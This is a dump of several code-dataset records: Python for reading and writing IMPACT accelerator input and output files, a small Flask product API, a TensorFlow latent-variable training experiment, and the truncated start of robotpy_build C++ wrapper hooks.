# m/s\n rel_gamma = 1.0 + beam['energy']/beam['mass']\n rel_beta = (1.0 - 1.0/rel_gamma/rel_gamma)**0.5\n dummy = 2*3.14159265359*beam['frequency']/clight\n \n if betx==0:\n beam['x00']=0.0\n beam['x11']=0.0\n beam['x01']=0.0 \n else: \n beam['x00']=dummy*( betx* norm_ex/rel_gamma/rel_beta /(1.0+alfx*alfx) )**0.5\n beam['x11']=rel_gamma*rel_beta*( norm_ex/rel_gamma/rel_beta /betx )**0.5\n beam['x01']=alfx / (1.0+alfx*alfx)**0.5\n \n if bety==0:\n beam['y00']=0.0\n beam['y11']=0.0\n beam['y01']=0.0 \n else: \n beam['y00']=dummy*( bety* norm_ey/rel_gamma/rel_beta /(1.0+alfy*alfy) )**0.5\n beam['y11']=rel_gamma*rel_beta*( norm_ey/rel_gamma/rel_beta /bety )**0.5\n beam['y01']=alfy / (1.0+alfy*alfy)**0.5 \n\n if betz==0:\n beam['z00']=0.0\n beam['z11']=0.0\n beam['z01']=0.0 \n else: \n beam['z00']=3.14159265359/180*( betz*norm_ez/(1.0+alfz*alfz) )**0.5\n beam['z11']=( norm_ez/betz )**0.5 /beam['mass']*1.0E6\n beam['z01']=-alfz / (1.0+alfz*alfz)**0.5 \n \n \ndef beam2str(beam):\n \"\"\"\n from beam to string list of IMPACT format\n input \n x = (dict) beam \n output \n f = (list) list of string of IMPACT format of beam\n \"\"\"\n beamStrList=['1 1 \\n',\n '6 '+str(beam['n_particles'])+' 2 0 1 \\n',\n str(beam['mesh_x'])+' '+str(beam['mesh_y'])+' '+\\\n str(beam['mesh_z'])+' 1 0.1 0.1 0.1 \\n',\n str(beam['distribution id'])+' '+\\\n str(beam['restart flag'])+' 0 1 \\n',\n str(beam['n_particles'])+' \\n',\n str(beam['current'])+' \\n',\n str(beam['charge per mass'])+' \\n',\n str(beam['x00'])+' '+str(beam['x11'])+' '+str(beam['x01'])+' '+'1 1 0 0 \\n',\n str(beam['y00'])+' '+str(beam['y11'])+' '+str(beam['y01'])+' '+'1 1 0 0 \\n',\n str(beam['z00'])+' '+str(beam['z11'])+' '+str(beam['z01'])+' '+'1 1 0 0 \\n',\n str(beam['current'])+' '+str(beam['energy'])+' '+str(beam['mass'])+' 1.0 '+\\\n str(beam['frequency'])+' '+str(beam['phase'])+' \\n',\n '!==lattice=======================================\\n' \n ]\n return beamStrList\n\n \ndef str2beam(beamStr):\n \"\"\"\n from string list of IMPACT format to beam\n input \n beamStr = (list) list of string of IMPACT format\n output \n beam = (dict) beam dictionary\n \"\"\"\n beam=getBeam()\n beam['n_particles']=int(beamStr[1].split()[1])\n beam['mesh_x'],beam['mesh_y'],beam['mesh_z']=[int(beamStr[2].split()[0]) for i in range(3)]\n beam['distribution id']=int(beamStr[3].split()[0])\n beam['restart flag']=int(beamStr[3].split()[1])\n beam['current']=float(beamStr[5].split()[0])\n beam['charge per mass']=float(beamStr[6].split()[0])\n beam['x00'],beam['x11'],beam['x01']=[float(beamStr[7].split()[i]) for i in range(3)]\n beam['y00'],beam['y11'],beam['y01']=[float(beamStr[8].split()[i]) for i in range(3)]\n beam['z00'],beam['z11'],beam['z01']=[float(beamStr[9].split()[i]) for i in range(3)]\n beam['current'],beam['energy'],beam['mass']=[float(beamStr[10].split()[i]) for i in range(3)]\n beam['frequency'],beam['phase']=[float(beamStr[10].split()[i]) for i in range(4,6)]\n return beam \n\n#%%============================================================================\n# lattice \n#==============================================================================\n\n#%%#================================element====================================\ndef getElem(elemType) : \n \"\"\"\n get a template of an element dictionary. \n input \n elemType = (str) element type\n output \n f = (dict) element dictionary\n \"\"\"\n if elemType=='drift' :\n return {'type':'drift', 'length': 0.1, 'n_sckick': 1, \n 'n_map': 1, 'radius': 1.0} \n elif elemType=='quad' :\n return {'type':'quad', 'length': 0.1, 'n_sckick': 2, 'n_map': 1, \n 'B1': 17.0, 'input file id' : 0, 'radius': 1.0} # B1 [T/m]\n elif elemType=='bend' :\n return {'type':'bend', 'length': 1.0, 'n_sckick': 25, 'n_map': 1, \n 'angle': 0.9, 'k1': 0.0, 'input switch' : 150, #angle [rad]\n 'radius': 1.0, 'entrance edge':0.0, 'exit edge':0.0, #edge[rad]\n 'entrance curvature':0.0, 'exit curvature':0.0, 'FINT':0.0} \n elif elemType=='scrf' :\n return {'type':'scrf', 'length': 0.948049, 'n_sckick': 100, 'n_map': 1,\n 'scale': 34.0e6, 'frequency': 650e6 , 'phase': 0.0, \n 'input file id' : 1, 'radius': 1.0} # phase [degree]\n elif elemType=='kick' :\n return {'type':'kick', 'dx': 0.0 , 'dpx': 0.0, 'dy' : 0.0, 'dpy': 0.0, \n 'dz' : 0.0, 'dpz': 0.0} \n # dx,dy in meter, dpx,dpy in radian, dz in degree, dpz in MeV \n elif elemType=='write full' :\n return {'type':'write full', 'output file id': 1000}\n elif elemType=='restart' :\n return {'type':'restart'} \n elif elemType=='halt' :\n return {'type':'halt'} \n \ndef elem2str(elemDict): \n \"\"\"\n from element to (IMPACT format) string\n input \n x = (dict) element dictionary\n output \n f = (str) element string in IMPACT format\n \"\"\"\n if elemDict['type']=='drift':\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 0 '+str(elemDict['radius'])+' /\\n'\n elif elemDict['type']=='quad' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 1 '+str(elemDict['B1'])+' '+\\\n str(elemDict['input file id'])+' '+str(elemDict['radius'])+' /\\n' \n elif elemDict['type']=='bend' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 4 '+str(elemDict['angle'])+' '+\\\n str(elemDict['k1'])+' '+str(elemDict['input switch'])+' '+\\\n str(elemDict['radius'])+' '+str(elemDict['entrance edge'])+' '+\\\n str(elemDict['exit edge'])+' '+\\\n str(elemDict['entrance curvature'])+' '+\\\n str(elemDict['exit curvature'])+' '+str(elemDict['FINT'])+' /\\n' \n elif elemDict['type']=='scrf' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 104 '+str(elemDict['scale'])+' '+\\\n str(elemDict['frequency'])+' '+str(elemDict['phase']) +' '+\\\n str(elemDict['input file id'])+' '+str(elemDict['radius'])+' /\\n' \n elif elemDict['type']=='kick' : \n return '0.0 0 0 -21 1.0 '+str(elemDict['dx'])+' '+\\\n str(elemDict['dpx'])+' '+str(elemDict['dy'])+' '+\\\n str(elemDict['dpy'])+' '+str(elemDict['dz'])+' '+\\\n str(elemDict['dpz'])+' /\\n' \n elif elemDict['type']=='write full' : \n return '0.0 0 '+str(elemDict['output file id'])+' -2 0.0 1 /\\n'\n elif elemDict['type']=='restart' : \n return '0.0 0 0 -7 0 /\\n'\n elif elemDict['type']=='halt' : \n return '0.0 1 1 -99 0 /\\n' \n\n \ndef str2elem(elemStr): \n# from (IMPACT format) string to element \n# input \n# elemStr = (str) string of a IMPACT lattice line\n# output \n# elemtDict = (dict) element dictionary \n elemStr = elemStr.split()\n elemID=int(float(elemStr[3]))\n if elemID == 0:\n elemtDict = {'type':'drift',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'radius': float(elemStr[4])\n } \n elif elemID == 1:\n elemtDict = {'type':'quad',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'B1': float(elemStr[4]), \n 'input file id': int(elemStr[5]), \n 'radius': float(elemStr[6])\n } \n elif elemID == 4:\n elemtDict = {'type':'bend',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'angle': float(elemStr[4]), \n 'k1': float(elemStr[5]), \n 'input switch': float(elemStr[6]),\n 'radius': float(elemStr[7]),\n 'entrance edge': float(elemStr[8]),\n 'exit edge': float(elemStr[9]),\n 'entrance curvature': float(elemStr[10]),\n 'exit curvature': float(elemStr[11]),\n 'FINT': float(elemStr[12]),\n } \n elif elemID == 104:\n elemtDict= {'type':'scrf',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'scale': float(elemStr[4]), \n 'frequency': float(elemStr[5]), \n 'phase': float(elemStr[6]), \n 'input file id': int(elemStr[7]), \n 'radius': float(elemStr[8])\n }\n elif elemID == -2:\n elemtDict= {'type':'write full',\n 'output file id': int(elemStr[2])} \n elif elemID == -7:\n elemtDict= {'type':'restart'}\n elif elemID == -99:\n elemtDict= {'type':'halt'} \n else :\n elemtDict= {} \n return elemtDict\n \n#%%=================================lattice====================================\n#lattice is a list of element dictionaries\n\ndef lattice2str(lattice):\n# from lattice to string list of IMPACT format\n# input \n# x = (list) lattice \n# output \n# f = (list) list of string of of IMPACT format\n latticeStr = []\n for i in range(len(lattice)):\n latticeStr.append(elem2str(lattice[i]))\n return latticeStr\n \ndef str2lattice(latticeStr):\n# from string list of IMPACT format to lattice\n# input \n# latticeStr = (list) list of string of of IMPACT format\n# output \n# lattice = (list) list of element dictionaries\n lattice = []\n for i in range(len(latticeStr)):\n elem = str2elem(latticeStr[i])\n if elem : #check if elem is not empty\n lattice.append(elem)\n return lattice \n\ndef updateLattice(lattice):\n# update lattice such that each begining location of element is saved\n# input \n# lattice = (list) list of elemenet dictionaries\n z=0.\n for i in range(len(lattice)):\n lattice[i]['z']=z\n z=z+lattice[i]['length']\n\n\ndef getElemIndex(lattice,typename):\n# from lattice list of dictionary to single element lattice list of dictionary\n# input \n# lattice = (list) list of elements dictionaries\n# output \n# oneElemLattice = (list) list of one type(=typename) element dictionaries\n f=[]\n for i in range(len(lattice)):\n if lattice[i]['type']==typename:\n f.append(i)\n return f\n#%%============================================================================\n# IMPACT test.in I/O \n#============================================================================== \ndef writeIMPACT(filename,beam,lattice=[]):\n# write a IMPACT input file\n# input \n# beam = (dict) beam dictionary\n# lattce = (list) list of element dictionaries\n beamStrList=beam2str(beam) \n latticeStrList=lattice2str(lattice)\n \n f=open(filename,'w') \n f.writelines(beamStrList)\n f.writelines(latticeStrList)\n f.close()\n\ndef readIMPACT(filename='test.in'):\n# read a IMPACT input file \n# output : (list) element dictionaries\n file = open(filename,'r')\n lines = file.readlines()\n file.close()\n row_end = len(lines)\n row_start = 11\n for i in range(0,row_end):\n if lines[i][:12] == '!==lattice==':\n row_start=i\n break\n lattice=str2lattice(lines[row_start+1:])\n beam=str2beam(lines[0:row_start])\n return beam, lattice\n \n \n#%%############################################################################\n###############################################################################\n### IMPACT OUTPUT Reader ###\n###############################################################################\n############################################################################### \ndef readReferenceOrbit(fileloc=''):\n file = open(fileloc+'fort.18','r')\n lines = file.readlines()\n file.close()\n f=[]\n for j in range(len(lines)) :\n f.append( [ float(lines[j].split()[i]) for i in range(5) ] )\n return f\n\n\ndef getZIndex(z,fileloc=''):\n rf = readReferenceOrbit(fileloc)\n dz = abs(rf[0][0]-z)\n for i in range(1,len(rf)) :\n if dz > abs(rf[i][0]-z) :\n dz=abs(rf[i][0]-z)\n f=i\n return f, rf[f][0]\n\n\ndef readBeamSize(direction,nSkip=1,fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[] \n for i in range(0,len(lines),nSkip) :\n f.append(float(lines[i].split()[2]))\n return f\n\n\ndef readBeamSizeAt(zIndex,direction,nSkip=1,fileLoc=''):\n# Read RMS beam size at location corresponds to zIndex\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n \n return float(lines[zIndex].split()[2]) \n \n \n \ndef readOptics(direction,nSkip=1,fileLoc=''):\n# Read Optics functions ( Optics ftn is calcualted using beam porfile )\n# input \n# zIndex = (int) \n# fileLoc = (string) path\n# output \n# self expnained\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[]\n for j in range(0,len(lines),nSkip) :\n sigmax, sigmap, alpha, emittance_norm = [ float(lines[j].split()[i]) for i in [2,4,5,6] ]\n beta=(1+alpha*alpha)**0.5 *sigmax/sigmap\n if direction == 'z':\n f.append( [beta, -alpha, emittance_norm] )\n else:\n f.append( [beta, -alpha, emittance_norm] )\n return f\n \ndef readOpticsAt(zIndex, direction, fileLoc=''):\n# Read Optics function at location corresponds to zIndex\n# input \n# zIndex = (int) \n# fileLoc = (string) path\n# output \n# self expnained\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n sigmax, sigmap, alpha, emittance_norm = [ float(lines[zIndex].split()[i]) for i in [2,4,5,6] ]\n beta=(1+alpha*alpha)**0.5 *sigmax/sigmap\n \n if direction == 'z':\n return beta, -alpha, emittance_norm\n else :\n return beta, alpha, emittance_norm\n \n \n \ndef readCentroid(direction, nSkip=1, fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[] \n for i in range(0,len(lines),nSkip) :\n f.append( [float(lines[i].split()[1]), float(lines[i].split()[3])] )\n return f \n\ndef readCentroidAt(zIndex, direction, fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n return float(lines[zIndex].split()[1]), float(lines[zIndex].split()[3])\n \n","sub_path":"pyimpact/impact.py","file_name":"impact.py","file_ext":"py","file_size_in_byte":19956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479924906","text":"# project/server/api/views.py\n\n\n#################\n#### imports ####\n#################\n\nfrom flask import Blueprint, request, abort\nfrom project.server.models import Product\nfrom project.server import app, db\nfrom werkzeug.debug import get_current_traceback\n\n################\n#### config ####\n################\n\napi_blueprint = Blueprint('api', __name__,)\n\n\n################\n#### routes ####\n################\n\n@api_blueprint.route('/product', methods=['GET', 'POST'])\ndef addproduct():\n product_code = \"\"\n items = request.json['items']\n try:\n for item in items:\n product_code = item['product_code']\n product_description = item['product_description']\n item = Product(product_code, product_description)\n db.session.add(item)\n db.session.commit()\n product_code = product_code + \",\"\n except Exception as e:\n track = get_current_traceback(skip=1, show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n abort(500)\n\n return 'Products: ' + product_code + ' added'\n","sub_path":"project/server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17221905","text":"import tensorflow as tf\nimport random\n#import tf.keras.layers.Dense\nimport numpy as np\nimport math as ma\n\ndef fun(m,x):\n\treturn m*x\n\ndef fun2(m,x):\n return m*ma.pow(x,2)\n\ndef fun3(m,x):\n return m*ma.pow(x,3)\n\n\nfor x in range(10):\n\tk = random.uniform(0, 1)\n\ty = fun(4,k)\n\tprint(str(k) + \",\" + str(y))\n\n\nlearning_rate = 0.0001\ntraining_epochs = 15\nbatch_size = 3\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 = 256 # 1st layer number of neurons\nn_hidden_2 = 256 # 2nd layer number of neurons\nn_input = 784 # MNIST data input (img shape: 28*28)\nn_classes = 1 # MNIST total classes (0-9 digits)\n\n\n\t\nX = tf.placeholder(\"float\", [None, 1])\nY = tf.placeholder(\"float\", [None, 3])\nZ = tf.placeholder(\"float\", [None, 1])\nZ_old = tf.placeholder(\"float\", [None, 1])\nX_old = tf.placeholder(\"float\", [None, 1])\nZ_new = tf.placeholder(\"float\", [None, 1])\nY_new = tf.placeholder(\"float\", [None, 3])\nY_old = tf.placeholder(\"float\", [None, 3])\n\n\n\nweights = {\n 'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n\n\ndef set_batch(batch_size):\n\tx_array = np.array([])\n\ty_array = np.array([])\n\tfor x in range(batch_size):\n\t\trandnum = random.randint(1,101)\n\t\tif randnum > 50:\n\t\t\tmaxx = 4\n\t\telse:\n\t\t\tmaxx = -4\n\t\tm = maxx\t\t\n\t\ty_ind = np.array([])\n\t\tk = random.uniform(0, 1)\n\t\ty1 = fun(m,k)\n\t\ty2 = fun2(m,k)\n\t\ty3 = fun3(m,k)\n\t\ty = np.array((y1,y2,y3))\n\t\tx_array = np.append(x_array, k)\n\t\ty_array = np.append(y_array, y)\n\n\tx_array = np.reshape(x_array,(-1,1))\n\ty_array = np.reshape(y_array,(-1,3))\n\t\n\treturn x_array, y_array\n\n\n\n# Create model\ndef pred(x):\n # Hidden fully connected layer with 256 neurons\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(x,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,3)\n return out_layer\n\ndef dec(h,z):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([h,z],axis = 1)\t\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,3)\n return out_layer\n\ndef z_pred(z,x):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([x,z],axis = 1)\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,1)\n return out_layer\n\ndef mag_pred(z,x):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([x,z],axis = 1)\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,1)\n return out_layer\n\n\nh = pred(X)\n#z_ = z_enc(Z)\ny_ = dec(h,Z)\n\n\nz_new_pred = z_pred(Z_old,X_old)\nmagnitude_pred = mag_pred(Z_old,X_old)\n\nmagnitude_real = tf.reduce_sum(tf.abs(Y_new - Y_old),axis = 1, keep_dims = True)\n\nmag_loss = tf.reduce_mean(tf.abs(magnitude_pred- magnitude_real))\nz_pred_loss = tf.reduce_mean(tf.squared_difference(z_new_pred , Z_new))\n\nz_loss = z_pred_loss + mag_loss\n\nloss = tf.reduce_mean(tf.squared_difference(y_, Y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss)\ntrain_z = optimizer.minimize(z_loss)\n\n# Initializing the variables\n\ngrads = tf.gradients(ys = loss, xs = Z)\ninit = tf.global_variables_initializer()\n\n#grads = tf.gradients(loss, Z)\n#grads, _ = tf.clip_by_global_norm(grads, 50) # gradient clipping\n#grads_and_vars = list(zip(grads, Z))\n#train_op_z = optimizer.apply_gradients(grads_and_vars)\n\n\n#grads = tf.gradients(ys = loss, xs = Z)\n\n\nwith tf.Session() as sess:\n\tsess.run(init)\n\tsaver = tf.train.Saver()\n\tsaver.restore(sess,'./model.ckpt')\n\tfor epoch in range(100000):\n\t\trandnum = random.randint(1,101)\n\t\tif randnum > 50:\n\t\t\tmaxx = 4\n\t\telse:\n\t\t\tmaxx = -4\n\n\t\tbatch_x, batch_y = set_batch(batch_size)\n\t\n#\t\tz = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t\tz = np.reshape(np.random.uniform(low=-0.1, high=0.1, size=(3,1)),(-1,1))\n\t#\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\tprint(\"new batch begins!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\t\tv = 0\n\t\tfor p in range(20):\n\n\t\t\tz_ol = np.copy(z)\n\t\t\tx_ol = np.copy(batch_x)\n\t\t\tc = sess.run([loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n\n\t\t\tprint('loss')\n\t\t\tprint(c)\n\t\t\tprint(\"z\")\n\t\t\tprint(z)\n\t\t\tpredy = np.reshape(sess.run([y_], feed_dict={X: batch_x,\n Y: batch_y, Z:z}),(-1,3))\n\n\t\t\tprint(\"y_old\")\n\t\t\tprint(predy)\n\t\t\tprint(\"y\")\n\t\t\tprint(batch_y)\n\t\t\n\t\t\tg = sess.run([grads],feed_dict={X: batch_x,Y: batch_y,Z:z})\n#\t\t\tprint(g[0][0])\n\t\t\tv_prev = np.copy(v)\n\t\t\tv = 0.001*v - 0.001*g[0][0]\n\t\t\tz += 0.001 * v_prev + (1+0.001)*v\n\t\t\tz = np.clip(z, -0.1, 0.1)\n\t\t\tz = [np.random.uniform(low=0.07, high=0.1, size=(1,1)) if z_ > 0 else np.random.uniform(low=-0.1, high=-0.07, size=(1,1)) for z_ in z]\t\t\t\n\t\t\tz = np.reshape(z,(3,1))\n\t\t\tz_ne = np.copy(z)\n\t\t\ty_new = np.reshape(sess.run([y_], feed_dict={X: batch_x,\n Y: batch_y, Z:z}),(-1,3))\n\t\t\tprint(\"y_new\")\n\t\t\tprint(y_new)\n\t#\t\t_, z_lo = sess.run([train_z, z_loss], feed_dict={X_old: x_ol, Z_old:z_ol, Z_new: z_ne})\n\t\t\t\n\t\t\t\n\t\t\tz_new_pre = sess.run([z_new_pred], feed_dict={X_old: x_ol, Z_old:z_ol})\n\n\t\t\tmag_new = sess.run([magnitude_real], feed_dict={Y_old:predy, Y_new:y_new})\n\t\t\tmag_pred = sess.run([magnitude_pred], feed_dict={Z_old:z_ol, X_old: x_ol})\n\n\t\t\t_, z_lo = sess.run([train_z, z_loss], feed_dict={X_old: x_ol, Z_old:z_ol, Z_new: z_ne,Y_old:predy, Y_new:y_new })\n\t\t\t\n\t\t\tprint(\"z loss\")\n\t\t\tprint(z_lo)\n\t\t\tprint(\"z_old\")\n\t\t\tprint(z_ol)\n\t\t\tprint(\"z_new\")\n\t\t\tprint(z_ne)\n\t\t\tprint(\"z_new_pred\")\n\t\t\tprint(z_new_pre)\n\t\t\tprint(\"mag\")\n\t\t\tprint(mag_new )\n\t\t\tprint(\"mag_pred\")\n\t\t\tprint(mag_pred)\t\t\n\t\t\tprint(\"##########################################################\")\t\n\t\t#\tc = sess.run([loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\t\t\n\t\t\t\n#\t\t\tprint(c)\t\t\n\t\t\n\t\tfor t in range(1):\n\t\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n\t\tprint(\"saving model\")\n\t\tsaver.save(sess, \"./model_binary.ckpt\")\n\n\n#\t\tpredy = sess.run([y_], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\t\n\n\n\t#\tbatch_x_, batch_y_ = set_batch(batch_size,-maxx)\n\t\t'''\n\t\t#z_ = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t#\tz = np.reshape(np.array(random.uniform(0, 1)),(-1,1))\n\t\tz = np.reshape(np.random.uniform(low=-0.0, high=1.0, size=(100,1)),(-1,1))\n\t\t#_, c = sess.run([train_op, loss], feed_dict={X: batch_x_,\n # Y: batch_y_, Z:z_})\n\t\tv = 0\n\t\tfor p in range(1000):\n\t\t\tg = sess.run([grads],feed_dict={X: batch_x_,Y: batch_y_,Z:z})\n\t\t\tv_prev = np.copy(v)\n\t\t\tv = 0.01*v - 0.001*g[0][0]\n\t\t\tz += 0.01 * v_prev + (1+0.01)*v\n#\t\t\tprint(type(z))\n\t\t\tz = np.clip(z, -1.0, 1.0)\n\n\t\tfor i in range(1):\n\t\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x_,\n Y: batch_y_, Z:z})\n\t#\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\t\n\t\t'''\n\t\tz = np.reshape(np.random.uniform(low=-0.1, high=0.1, size=(3,1)),(-1,1))\n\t\tc = sess.run([loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n#\t\tprint(c)\n#\t\tprint(\"random\")\n\n\t\t\n\t#\tc = sess.run([loss], feed_dict={X: batch_x_,\n # Y: batch_y_, Z:z})\n#\t\tprint(c)\n\n\n\t\n\n\n\tfor x in range(10):\n\t\tk = random.uniform(0, 1)\n\t\tk_ = np.reshape(k,(-1,1))\n\t#\tz = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t\tz = np.reshape(np.array(random.uniform(0, 1)),(-1,2))\n\t\ty = sess.run([y_], feed_dict={X:k_,Z:z})\n\t\tprint(str(k) + \",\" + str(y))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main3_binary.py","file_name":"main3_binary.py","file_ext":"py","file_size_in_byte":9088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236273710","text":"\"\"\"\n Header2Whatever hooks used for generating C++ wrappers\n\"\"\"\n\nimport sphinxify\n\n# terrible hack\n__name__ = \"robotpy_build.hooks\"\nfrom .hooks_datacfg import ClassData, FunctionData, MethodData\n\n\n_missing = object()\n\n# TODO: this isn't the best solution\ndef _gen_int_types():\n for i in ('int', 'uint'):\n for j in ('', '_fast', \"_least\"):\n for k in ('8', '16', '32', '64'):\n yield f\"{i}{j}{k}_t\"\n yield \"intmax_t\"\n yield \"uintmax_t\"\n\n_int32_types = set(_gen_int_types())\n\n\nclass HookError(Exception):\n pass\n\n\ndef _strip_prefixes(global_data, name):\n sp = global_data.strip_prefixes\n if sp:\n for pfx in sp:\n if name.startswith(pfx):\n name = name[len(pfx) :]\n break\n\n return name\n\n\ndef _resolve_default(fn, name):\n if isinstance(name, (int, float)):\n return str(name)\n if name in (\"NULL\", \"nullptr\"):\n return name\n\n # if there's a parent, look there\n parent = fn[\"parent\"]\n if parent:\n for prop in parent[\"properties\"][\"public\"]:\n if prop[\"name\"] == name:\n name = f\"{parent['namespace']}::{parent['name']}::{name}\"\n return name\n\n\ndef _enum_hook(en, global_data, enum_data):\n ename = en.get(\"name\")\n value_prefix = None\n if ename:\n data = enum_data.get(ename)\n if data and data.value_prefix:\n value_prefix = data.value_prefix\n else:\n value_prefix = ename\n\n en[\"x_name\"] = _strip_prefixes(global_data, ename)\n\n for v in en[\"values\"]:\n name = v[\"name\"]\n if value_prefix and name.startswith(value_prefix):\n name = name[len(value_prefix) :]\n if name[0] == \"_\":\n name = name[1:]\n v[\"x_name\"] = name\n\n\ndef header_hook(header, data):\n \"\"\"Called for each header\"\"\"\n global_data = data.get(\"data\", {})\n for en in header.enums:\n en[\"x_namespace\"] = en[\"namespace\"]\n _enum_hook(en, global_data, global_data.enums)\n\n\ndef _function_hook(fn, global_data, fn_data, typ):\n \"\"\"shared with methods/functions\"\"\"\n\n # Ignore operators, move constructors, copy constructors\n if (\n fn.get(\"operator\")\n or fn.get(\"destructor\")\n or (\n fn.get(\"constructor\")\n and fn[\"parameters\"]\n and fn[\"parameters\"][0][\"class\"]\n and fn[\"parameters\"][0][\"class\"][\"name\"] == fn[\"name\"]\n )\n ):\n fn[\"data\"] = typ({\"ignore\": True})\n return\n\n # Python exposed function name converted to camelcase\n x_name = _strip_prefixes(global_data, fn[\"name\"])\n x_name = x_name[0].lower() + x_name[1:]\n\n x_in_params = []\n x_out_params = []\n x_rets = []\n x_temps = []\n\n x_genlambda = False\n x_lambda_pre = []\n x_lambda_post = []\n\n data = fn_data.get(fn[\"name\"], _missing)\n if 